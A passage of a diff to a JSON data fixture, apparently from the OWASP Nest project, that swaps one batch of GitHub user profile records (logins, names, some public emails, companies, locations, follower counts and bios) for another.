"2024-09-22T19:37:39.505Z", + "name": "", + "login": "christophe226", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47250981?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/61734671?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-02-01T15:14:54Z", - "updated_at": "2022-11-10T17:08:05Z", - "node_id": "MDQ6VXNlcjQ3MjUwOTgx", + "public_repositories_count": 3, + "created_at": "2020-03-03T09:55:24Z", + "updated_at": "2021-09-07T14:27:46Z", + "node_id": "MDQ6VXNlcjYxNzM0Njcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420153,49 +679302,49 @@ }, { "model": "github.user", - "pk": 2397, + "pk": 7736, "fields": { - "nest_created_at": "2024-09-12T01:23:56.619Z", - "nest_updated_at": "2024-09-12T01:23:56.619Z", - "name": "Roy Chen", - "login": "roycyt", + "nest_created_at": "2024-09-22T09:36:21.045Z", + "nest_updated_at": "2024-09-22T19:38:15.143Z", + "name": "william billaud", + "login": "william-billaud", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3922108?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/23636016?v=4", "company": "", - "location": "Taipei, Taiwan", + "location": "france", "collaborators_count": 0, - "following_count": 338, - "followers_count": 29, - "public_gists_count": 16, - "public_repositories_count": 59, - "created_at": "2013-03-20T15:20:40Z", - "updated_at": "2024-08-31T07:11:06Z", - "node_id": "MDQ6VXNlcjM5MjIxMDg=", + "following_count": 40, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 12, + "created_at": "2016-11-21T14:20:04Z", + "updated_at": "2024-09-20T20:13:44Z", + "node_id": "MDQ6VXNlcjIzNjM2MDE2", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2398, + "pk": 7737, "fields": { - "nest_created_at": "2024-09-12T01:23:58.864Z", - "nest_updated_at": "2024-09-12T01:23:58.864Z", - "name": "", - "login": "nickwilliams-codynamic", + "nest_created_at": "2024-09-22T09:36:21.357Z", + "nest_updated_at": "2024-09-22T19:35:24.023Z", + "name": "Pavel", + "login": "pna-nca", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45215237?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/107552671?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 5, - "created_at": "2018-11-20T21:37:46Z", - "updated_at": "2024-09-02T02:15:18Z", - "node_id": "MDQ6VXNlcjQ1MjE1MjM3", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-15T11:15:41Z", + "updated_at": "2024-09-10T18:57:11Z", + "node_id": "U_kgDOBmkfnw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420203,74 +679352,74 @@ }, { "model": "github.user", - "pk": 2399, + "pk": 7738, "fields": { - "nest_created_at": "2024-09-12T01:24:02.169Z", - "nest_updated_at": "2024-09-12T01:24:02.169Z", - "name": "Michael Gissing", - "login": "scolytus", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1374754?v=4", + "nest_created_at": "2024-09-22T09:36:22.356Z", + "nest_updated_at": "2024-09-22T19:35:24.965Z", + "name": "Daryl Walleck", + "login": "dwalleck", + "email": "dwalleck@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/843116?v=4", "company": "", - "location": "Graz, Austria", + "location": "San Antonio, TX", "collaborators_count": 0, - "following_count": 9, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2012-01-24T12:40:16Z", - "updated_at": "2020-08-10T06:07:02Z", - "node_id": "MDQ6VXNlcjEzNzQ3NTQ=", + "following_count": 25, + "followers_count": 16, + "public_gists_count": 96, + "public_repositories_count": 80, + "created_at": "2011-06-10T22:33:46Z", + "updated_at": "2024-09-02T21:56:34Z", + "node_id": "MDQ6VXNlcjg0MzExNg==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "darylwalleck" } }, { "model": "github.user", - "pk": 2400, + "pk": 7739, "fields": { - "nest_created_at": "2024-09-12T01:24:03.841Z", - "nest_updated_at": "2024-09-12T01:24:03.841Z", - "name": "Charles Howes", - "login": "PenelopeFudd", + "nest_created_at": "2024-09-22T09:36:22.673Z", + "nest_updated_at": "2024-09-22T19:35:25.287Z", + "name": "Antoine Ruffino", + "login": "a-ruff", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1606480?v=4", - "company": "@netskrt", + "avatar_url": "https://avatars.githubusercontent.com/u/138585151?v=4", + "company": "CloudBees", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 8, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2012-04-02T23:46:24Z", - "updated_at": "2024-06-21T23:48:08Z", - "node_id": "MDQ6VXNlcjE2MDY0ODA=", - "bio": "I'm a hacker from back when hacking was cool! Got a BSc in Computer Science and another in Biotechnology, worked at AWS for 4+ years, and I'm at Netskrt.io!", - "is_hireable": true, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-07-04T11:22:28Z", + "updated_at": "2024-05-27T13:46:07Z", + "node_id": "U_kgDOCEKkPw", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2401, + "pk": 7740, "fields": { - "nest_created_at": "2024-09-12T01:24:06.757Z", - "nest_updated_at": "2024-09-12T01:24:06.757Z", + "nest_created_at": "2024-09-22T09:36:22.994Z", + "nest_updated_at": "2024-09-22T19:35:25.616Z", "name": "", - "login": "jrobertsz366", + "login": "CharlieSears", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50830420?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19413468?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-05-20T11:31:26Z", - "updated_at": "2022-04-08T02:45:35Z", - "node_id": "MDQ6VXNlcjUwODMwNDIw", + "public_repositories_count": 5, + "created_at": "2016-05-17T16:56:47Z", + "updated_at": "2024-06-03T21:19:20Z", + "node_id": "MDQ6VXNlcjE5NDEzNDY4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420278,74 +679427,74 @@ }, { "model": "github.user", - "pk": 2402, + "pk": 7741, "fields": { - "nest_created_at": "2024-09-12T01:24:09.605Z", - "nest_updated_at": "2024-09-12T01:24:09.605Z", - "name": "Shivam", - "login": "shivam15", + "nest_created_at": "2024-09-22T09:36:23.324Z", + "nest_updated_at": "2024-09-22T19:35:25.929Z", + "name": "Adrián Álvarez Sánchez", + "login": "adrianasantex", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8672610?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/115696190?v=4", "company": "", - "location": "Hyderabad", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2014-09-05T20:29:51Z", - "updated_at": "2024-09-03T06:12:17Z", - "node_id": "MDQ6VXNlcjg2NzI2MTA=", - "bio": "\r\nEngineer\r\n", - "is_hireable": true, + "public_repositories_count": 1, + "created_at": "2022-10-13T08:14:33Z", + "updated_at": "2024-07-18T11:40:59Z", + "node_id": "U_kgDOBuViPg", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2403, + "pk": 7742, "fields": { - "nest_created_at": "2024-09-12T01:24:11.286Z", - "nest_updated_at": "2024-09-12T01:24:11.286Z", - "name": "Stefan-Alexandru Rentea", - "login": "stefan574", + "nest_created_at": "2024-09-22T09:36:23.950Z", + "nest_updated_at": "2024-09-22T19:35:26.613Z", + "name": "", + "login": "gogo02", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13134474?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/56041085?v=4", "company": "", - "location": "Bucharest, Romania", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 8, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-07-01T11:40:24Z", - "updated_at": "2021-11-29T07:52:31Z", - "node_id": "MDQ6VXNlcjEzMTM0NDc0", + "public_repositories_count": 1, + "created_at": "2019-10-01T16:38:26Z", + "updated_at": "2019-10-01T16:38:28Z", + "node_id": "MDQ6VXNlcjU2MDQxMDg1", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2404, + "pk": 7743, "fields": { - "nest_created_at": "2024-09-12T01:24:12.978Z", - "nest_updated_at": "2024-09-12T01:24:12.978Z", - "name": "Henrik Sachse", - "login": "0x7d7b", + "nest_created_at": "2024-09-22T09:36:24.278Z", + "nest_updated_at": "2024-09-22T19:35:26.953Z", + "name": "", + "login": "HumanoidPhantom", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56216308?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9196341?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 23, - "followers_count": 3, - "public_gists_count": 8, - "public_repositories_count": 7, - "created_at": "2019-10-06T07:13:25Z", - "updated_at": "2024-09-03T13:59:49Z", - "node_id": "MDQ6VXNlcjU2MjE2MzA4", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2014-10-13T12:29:33Z", + "updated_at": "2024-07-01T11:48:47Z", + "node_id": "MDQ6VXNlcjkxOTYzNDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420353,24 +679502,24 @@ }, { "model": "github.user", - "pk": 2405, + "pk": 7744, "fields": { - "nest_created_at": "2024-09-12T01:24:17.170Z", - "nest_updated_at": "2024-09-16T22:28:49.197Z", - "name": "Rich DiCroce", - "login": "rdicroce", + "nest_created_at": "2024-09-22T09:36:24.586Z", + "nest_updated_at": "2024-09-22T19:35:27.264Z", + "name": "Kareem Khan", + "login": "kareem-DA", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1458922?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59445682?v=4", + "company": "Digital Asset", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2012-02-21T21:06:09Z", - "updated_at": "2024-04-09T19:09:12Z", - "node_id": "MDQ6VXNlcjE0NTg5MjI=", + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2020-01-02T14:59:04Z", + "updated_at": "2024-07-11T14:37:12Z", + "node_id": "MDQ6VXNlcjU5NDQ1Njgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420378,74 +679527,74 @@ }, { "model": "github.user", - "pk": 2406, + "pk": 7745, "fields": { - "nest_created_at": "2024-09-12T01:24:18.817Z", - "nest_updated_at": "2024-09-12T01:24:18.817Z", - "name": "", - "login": "allwin101", + "nest_created_at": "2024-09-22T09:36:24.933Z", + "nest_updated_at": "2024-09-22T19:35:27.580Z", + "name": "mestrade", + "login": "mestrade", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2221330?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5852052?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 1, + "following_count": 4, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2012-08-26T09:32:11Z", - "updated_at": "2024-06-07T09:25:53Z", - "node_id": "MDQ6VXNlcjIyMjEzMzA=", + "public_repositories_count": 15, + "created_at": "2013-11-04T15:29:24Z", + "updated_at": "2024-08-22T15:47:11Z", + "node_id": "MDQ6VXNlcjU4NTIwNTI=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "mestrade" } }, { "model": "github.user", - "pk": 2407, + "pk": 7746, "fields": { - "nest_created_at": "2024-09-12T01:24:20.554Z", - "nest_updated_at": "2024-09-12T01:24:20.554Z", - "name": "Alfredo Deza", - "login": "alfredodeza", + "nest_created_at": "2024-09-22T09:36:26.023Z", + "nest_updated_at": "2024-09-22T19:38:22.467Z", + "name": "", + "login": "AdrienGuillerme", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/317847?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19572671?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 800, - "public_gists_count": 47, - "public_repositories_count": 223, - "created_at": "2010-06-29T19:34:02Z", - "updated_at": "2024-09-10T23:19:57Z", - "node_id": "MDQ6VXNlcjMxNzg0Nw==", - "bio": "Author, technologist, Olympian, former pro-athlete. ", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-05-25T13:38:25Z", + "updated_at": "2019-10-21T17:03:40Z", + "node_id": "MDQ6VXNlcjE5NTcyNjcx", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2408, + "pk": 7747, "fields": { - "nest_created_at": "2024-09-12T01:24:23.081Z", - "nest_updated_at": "2024-09-12T01:24:23.081Z", + "nest_created_at": "2024-09-22T09:36:26.336Z", + "nest_updated_at": "2024-09-22T19:38:50.824Z", "name": "", - "login": "theoctopus0", + "login": "jankuehl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9120266?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58301902?v=4", + "company": "RIGS IT GmbH", + "location": "Potsdam, Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-10-09T19:44:36Z", - "updated_at": "2021-08-27T06:50:07Z", - "node_id": "MDQ6VXNlcjkxMjAyNjY=", + "public_repositories_count": 5, + "created_at": "2019-11-28T14:45:37Z", + "updated_at": "2022-05-05T13:08:29Z", + "node_id": "MDQ6VXNlcjU4MzAxOTAy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420453,149 +679602,149 @@ }, { "model": "github.user", - "pk": 2409, + "pk": 7748, "fields": { - "nest_created_at": "2024-09-12T01:24:25.165Z", - "nest_updated_at": "2024-09-12T01:24:25.165Z", - "name": "Szasza Palmer", - "login": "Szasza", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/911466?v=4", - "company": "Holocron One", - "location": "Canberra, Australia", + "nest_created_at": "2024-09-22T09:36:26.645Z", + "nest_updated_at": "2024-09-22T19:35:29.265Z", + "name": "Ross E Esposito", + "login": "rossops", + "email": "rossespo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20447042?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 13, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2011-07-12T23:15:39Z", - "updated_at": "2024-07-22T05:52:10Z", - "node_id": "MDQ6VXNlcjkxMTQ2Ng==", - "bio": "Systems Engineer / Software Architect", - "is_hireable": true, + "public_repositories_count": 2, + "created_at": "2016-07-13T21:05:46Z", + "updated_at": "2024-09-14T11:38:32Z", + "node_id": "MDQ6VXNlcjIwNDQ3MDQy", + "bio": "Devops extraordinaire! ", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2410, + "pk": 7749, "fields": { - "nest_created_at": "2024-09-12T01:24:26.908Z", - "nest_updated_at": "2024-09-12T01:24:26.908Z", - "name": "Alex SZAKALY", - "login": "alex1989hu", + "nest_created_at": "2024-09-22T09:36:27.296Z", + "nest_updated_at": "2024-09-22T19:35:29.892Z", + "name": "Daniel aka DKADE", + "login": "dkade", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10764100?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5859944?v=4", "company": "", - "location": "Zürich, Switzerland", + "location": "", "collaborators_count": 0, "following_count": 3, - "followers_count": 8, + "followers_count": 9, "public_gists_count": 1, - "public_repositories_count": 16, - "created_at": "2015-01-29T21:27:52Z", - "updated_at": "2024-08-29T16:15:05Z", - "node_id": "MDQ6VXNlcjEwNzY0MTAw", - "bio": "", + "public_repositories_count": 7, + "created_at": "2013-11-05T12:37:36Z", + "updated_at": "2024-01-15T18:55:14Z", + "node_id": "MDQ6VXNlcjU4NTk5NDQ=", + "bio": "Lead Security Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2411, + "pk": 7750, "fields": { - "nest_created_at": "2024-09-12T01:24:28.198Z", - "nest_updated_at": "2024-09-12T02:15:20.822Z", - "name": "", - "login": "dfn-certling", + "nest_created_at": "2024-09-22T09:36:27.656Z", + "nest_updated_at": "2024-09-22T19:35:30.224Z", + "name": "Etienne Sellan", + "login": "H4ckd4ddy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2751709?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20478023?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2012-11-08T15:34:35Z", - "updated_at": "2024-08-23T12:54:02Z", - "node_id": "MDQ6VXNlcjI3NTE3MDk=", - "bio": "", - "is_hireable": false, + "following_count": 31, + "followers_count": 196, + "public_gists_count": 2, + "public_repositories_count": 39, + "created_at": "2016-07-15T14:16:37Z", + "updated_at": "2024-09-08T07:40:49Z", + "node_id": "MDQ6VXNlcjIwNDc4MDIz", + "bio": "🚀", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2412, + "pk": 7751, "fields": { - "nest_created_at": "2024-09-12T01:24:29.897Z", - "nest_updated_at": "2024-09-12T01:24:29.897Z", - "name": "Martin Hock", - "login": "mnhock", - "email": "martin.hock.de@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5895296?v=4", - "company": "", - "location": "Nuremberg, Germany", + "nest_created_at": "2024-09-22T09:36:27.980Z", + "nest_updated_at": "2024-09-22T19:38:16.087Z", + "name": "Guilherme Macedo", + "login": "macedogm", + "email": "guilherme.macedo@suse.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17654553?v=4", + "company": "@suse @rancher", + "location": "Brazil", "collaborators_count": 0, - "following_count": 66, - "followers_count": 50, + "following_count": 43, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-11-09T11:06:55Z", - "updated_at": "2024-09-09T08:18:24Z", - "node_id": "MDQ6VXNlcjU4OTUyOTY=", - "bio": "", + "public_repositories_count": 8, + "created_at": "2016-03-04T20:16:26Z", + "updated_at": "2024-09-16T11:19:14Z", + "node_id": "MDQ6VXNlcjE3NjU0NTUz", + "bio": "Security tech lead @SUSE @rancher", "is_hireable": false, - "twitter_username": "mnhocktweets" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2413, + "pk": 7752, "fields": { - "nest_created_at": "2024-09-12T01:24:31.173Z", - "nest_updated_at": "2024-09-12T01:42:01.728Z", - "name": "Ronny Perinke", - "login": "sephiroth-j", + "nest_created_at": "2024-09-22T09:36:28.300Z", + "nest_updated_at": "2024-09-22T19:35:30.852Z", + "name": "", + "login": "joguas-MSFT", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23166289?v=4", - "company": "@InversoGmbH", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/107583107?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-10-31T10:08:48Z", - "updated_at": "2024-04-10T14:08:44Z", - "node_id": "MDQ6VXNlcjIzMTY2Mjg5", - "bio": "Software architect and full-stack developer", + "public_repositories_count": 0, + "created_at": "2022-06-15T19:55:21Z", + "updated_at": "2024-04-05T14:43:17Z", + "node_id": "U_kgDOBmmWgw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2414, + "pk": 7753, "fields": { - "nest_created_at": "2024-09-12T01:24:32.473Z", - "nest_updated_at": "2024-09-12T01:24:32.474Z", - "name": "Lucas Bechholtz", - "login": "luhahn", + "nest_created_at": "2024-09-22T09:36:28.933Z", + "nest_updated_at": "2024-09-22T19:35:31.484Z", + "name": "", + "login": "michael-rodriguez-ttd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61747797?v=4", - "company": "Novum-RGI", + "avatar_url": "https://avatars.githubusercontent.com/u/33063673?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-03-03T15:19:51Z", - "updated_at": "2024-08-25T07:34:16Z", - "node_id": "MDQ6VXNlcjYxNzQ3Nzk3", + "public_repositories_count": 0, + "created_at": "2017-10-24T14:40:27Z", + "updated_at": "2024-03-07T20:11:06Z", + "node_id": "MDQ6VXNlcjMzMDYzNjcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420603,24 +679752,24 @@ }, { "model": "github.user", - "pk": 2415, + "pk": 7754, "fields": { - "nest_created_at": "2024-09-12T01:24:33.795Z", - "nest_updated_at": "2024-09-12T01:24:33.796Z", - "name": "", - "login": "mgoblue0970", + "nest_created_at": "2024-09-22T09:36:29.240Z", + "nest_updated_at": "2024-09-22T19:38:18.585Z", + "name": "Sergey Panfilov", + "login": "sergray", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/74521411?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/195381?v=4", "company": "", - "location": "", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-11-16T03:13:17Z", - "updated_at": "2020-11-16T03:13:17Z", - "node_id": "MDQ6VXNlcjc0NTIxNDEx", + "following_count": 68, + "followers_count": 30, + "public_gists_count": 32, + "public_repositories_count": 91, + "created_at": "2010-02-03T10:22:57Z", + "updated_at": "2024-09-13T11:30:31Z", + "node_id": "MDQ6VXNlcjE5NTM4MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420628,74 +679777,99 @@ }, { "model": "github.user", - "pk": 2416, + "pk": 7755, "fields": { - "nest_created_at": "2024-09-12T01:24:38.371Z", - "nest_updated_at": "2024-09-12T01:24:38.371Z", - "name": "Marene Joecel Sembrano", - "login": "mjbsembrano", + "nest_created_at": "2024-09-22T09:36:29.551Z", + "nest_updated_at": "2024-09-22T19:35:32.129Z", + "name": "Muhammed Kılıç", + "login": "kiliczsh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54050164?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3473393?v=4", + "company": "@Invicti-Security", + "location": "Malta", + "collaborators_count": 0, + "following_count": 1392, + "followers_count": 152, + "public_gists_count": 8, + "public_repositories_count": 55, + "created_at": "2013-02-04T16:42:28Z", + "updated_at": "2024-09-15T19:53:57Z", + "node_id": "MDQ6VXNlcjM0NzMzOTM=", + "bio": "Senior Software Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7756, + "fields": { + "nest_created_at": "2024-09-22T09:36:29.900Z", + "nest_updated_at": "2024-09-22T19:39:41.648Z", + "name": "Mend Renovate", + "login": "renovate-bot", + "email": "renovate@whitesourcesoftware.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25180681?v=4", + "company": "@mend", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 7, + "followers_count": 1631, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2019-08-13T02:30:09Z", - "updated_at": "2024-09-04T11:51:38Z", - "node_id": "MDQ6VXNlcjU0MDUwMTY0", - "bio": "", + "public_repositories_count": 11328, + "created_at": "2017-01-17T16:55:44Z", + "updated_at": "2024-09-17T11:08:10Z", + "node_id": "MDQ6VXNlcjI1MTgwNjgx", + "bio": "Mend Renovate is a bot to keep dependencies up-to-date using Pull Requests. To install: https://github.com/apps/renovate", "is_hireable": false, - "twitter_username": "" + "twitter_username": "renovatebot" } }, { "model": "github.user", - "pk": 2417, + "pk": 7757, "fields": { - "nest_created_at": "2024-09-12T01:24:42.078Z", - "nest_updated_at": "2024-09-12T01:24:42.078Z", - "name": "Nille af Ekenstam", - "login": "nille", + "nest_created_at": "2024-09-22T09:36:30.840Z", + "nest_updated_at": "2024-09-22T19:35:33.384Z", + "name": "Tom", + "login": "tomjackman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1552156?v=4", - "company": "Amazon Web Services", - "location": "Stockholm, Sweden", + "avatar_url": "https://avatars.githubusercontent.com/u/5624453?v=4", + "company": "", + "location": "Ireland", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 73, + "followers_count": 34, "public_gists_count": 3, - "public_repositories_count": 22, - "created_at": "2012-03-19T09:13:19Z", - "updated_at": "2024-06-25T11:04:34Z", - "node_id": "MDQ6VXNlcjE1NTIxNTY=", - "bio": "", + "public_repositories_count": 82, + "created_at": "2013-10-06T20:24:37Z", + "updated_at": "2024-09-14T17:05:32Z", + "node_id": "MDQ6VXNlcjU2MjQ0NTM=", + "bio": "Formerly Uber, Red Hat.", "is_hireable": false, - "twitter_username": "nilrod" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2418, + "pk": 7758, "fields": { - "nest_created_at": "2024-09-12T01:24:55.329Z", - "nest_updated_at": "2024-09-12T01:24:55.329Z", + "nest_created_at": "2024-09-22T09:36:31.152Z", + "nest_updated_at": "2024-09-22T19:35:33.707Z", "name": "", - "login": "steffenolsen", + "login": "XiChen-Tibco", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78483374?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/87026264?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-02-03T12:30:39Z", - "updated_at": "2022-09-05T19:45:49Z", - "node_id": "MDQ6VXNlcjc4NDgzMzc0", + "public_repositories_count": 1, + "created_at": "2021-07-06T14:38:52Z", + "updated_at": "2021-08-11T21:58:08Z", + "node_id": "MDQ6VXNlcjg3MDI2MjY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420703,74 +679877,74 @@ }, { "model": "github.user", - "pk": 2419, + "pk": 7759, "fields": { - "nest_created_at": "2024-09-12T01:24:58.280Z", - "nest_updated_at": "2024-09-12T01:24:59.542Z", - "name": "Scott Chapman", - "login": "ScottChapman", - "email": "scott@chapman.us", - "avatar_url": "https://avatars.githubusercontent.com/u/1517892?v=4", - "company": "@IBM", - "location": "USA", + "nest_created_at": "2024-09-22T09:36:31.477Z", + "nest_updated_at": "2024-09-22T19:38:17.957Z", + "name": "Yassine Ilmi", + "login": "yilmi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9211413?v=4", + "company": "Thomson Reuters", + "location": "not too far", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 4, - "public_repositories_count": 54, - "created_at": "2012-03-08T21:44:51Z", - "updated_at": "2023-12-20T16:17:28Z", - "node_id": "MDQ6VXNlcjE1MTc4OTI=", - "bio": "", + "following_count": 10, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2014-10-14T09:24:26Z", + "updated_at": "2024-09-17T23:28:27Z", + "node_id": "MDQ6VXNlcjkyMTE0MTM=", + "bio": "...", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2420, + "pk": 7760, "fields": { - "nest_created_at": "2024-09-12T01:25:04.168Z", - "nest_updated_at": "2024-09-12T02:39:41.173Z", - "name": "Matthias Kammerinke", - "login": "bugbouncer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9417474?v=4", - "company": "Schenker AG", + "nest_created_at": "2024-09-22T09:36:31.832Z", + "nest_updated_at": "2024-09-22T19:35:34.331Z", + "name": "", + "login": "davidhernandeze", + "email": "davidhernandeze@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22482495?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 16, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-10-27T13:42:59Z", - "updated_at": "2022-02-08T06:42:55Z", - "node_id": "MDQ6VXNlcjk0MTc0NzQ=", + "public_repositories_count": 12, + "created_at": "2016-09-27T19:45:24Z", + "updated_at": "2024-08-21T21:33:13Z", + "node_id": "MDQ6VXNlcjIyNDgyNDk1", "bio": "", "is_hireable": false, - "twitter_username": "bugbouncer" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2421, + "pk": 7761, "fields": { - "nest_created_at": "2024-09-12T01:25:05.503Z", - "nest_updated_at": "2024-09-12T01:25:05.503Z", - "name": "Ed Macke", - "login": "edmacke", + "nest_created_at": "2024-09-22T09:36:32.150Z", + "nest_updated_at": "2024-09-22T19:35:34.639Z", + "name": "", + "login": "drJabber", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26488296?v=4", - "company": "Lincoln Financial Group", + "avatar_url": "https://avatars.githubusercontent.com/u/2504840?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-03-17T15:54:51Z", - "updated_at": "2021-03-22T19:07:29Z", - "node_id": "MDQ6VXNlcjI2NDg4Mjk2", + "public_repositories_count": 